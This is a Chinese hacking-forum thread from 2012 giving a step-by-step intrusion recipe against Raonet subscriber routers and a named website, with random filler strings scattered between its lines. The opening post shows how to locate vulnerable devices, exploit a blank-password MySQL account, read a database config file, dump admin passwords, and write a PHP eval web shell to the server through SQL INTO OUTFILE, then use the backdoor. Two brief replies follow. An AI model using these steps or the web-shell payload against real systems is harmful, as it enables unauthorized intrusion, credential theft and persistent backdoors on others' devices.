找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3025|回复: 2
打印 上一主题 下一主题

利用某路由器漏洞入侵国外站点

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:30:18 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  寻找存在漏洞的路由器方法:
  o9 g- J- x+ _# s! c4 S# G0 T: t/ _; g
- }3 Q2 ~& b# V3 {$ D* i1 M+ n1:google搜索'Raonet Subscriber Ethernet Router'5 K1 @9 h) j0 g7 W) m; ~" Y
  @" ~2 S3 X5 h; [$ Z% m
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr20015 T: H; S9 j6 Z' V" o1 o

0 E" ~) T+ h* ^1 x; }! r! Q8 u+ ?) p3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。2 v, b- q8 l: x+ s' J( s
  N* S& i. T$ w. R
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......- @- W, q: z; M, N( ?

1 I4 _- ]( U* _6 B
3 S9 [6 I& ]  b6 J# j* f% c+ v8 ^5 o8 \
入侵步骤:
( d0 E+ J+ w0 P$ Q' [0 M4 K' A' Y1 d* [0 R2 O
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php- e. ^0 U5 W( J2 [9 {/ z( @( C* b
2 Y# P; V' n! Y" [: j5 [
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
% q5 g9 Q4 p+ i( Z+ Q3:得到密码后连接,查看GUI管理密码:" B, U" g4 r) k" U" Q; F
use ser_500
4 b* f, e% O+ R4 z6 fselect id,passwd from user;; B  ?; B+ i, e# ^
4:通过数据库写入webshell,执行命令:
' g/ h, ^2 I, S; R3 i* _use mysql;
  N  G4 u' O, N# C/ I4 v! R7 m: Wcreate table ok(cmd TEXT);5 t; g1 T& D$ R9 ]
insert into ok values("<?php @eval($_POST[cmd])?>");; U* S. q: i9 M" [. Q
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
" p' K, N0 M* |' f; |$ o- C% Wdrop table ok;0 l+ v1 d7 T9 h9 f

, Z  _0 E9 }8 O7 B& ?) F2 ]3 W) ^5 x/ ?5:连接后门shell.php 5 ^  \* S/ B6 n6 S5 S6 ?8 a4 N
/ X3 \8 x1 ]3 d
6. 搞定!
# s& r8 u* R5 v1 ^3 ?+ u' ?% N. p! o. I6 U& E
回复

使用道具 举报

沙发
发表于 2013-7-27 20:06:50 | 只看该作者
这个后果可以很严重的说
回复 支持 反对

使用道具 举报

板凳
发表于 2013-7-29 12:07:54 | 只看该作者
不错哦,黑服务器补洞。。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表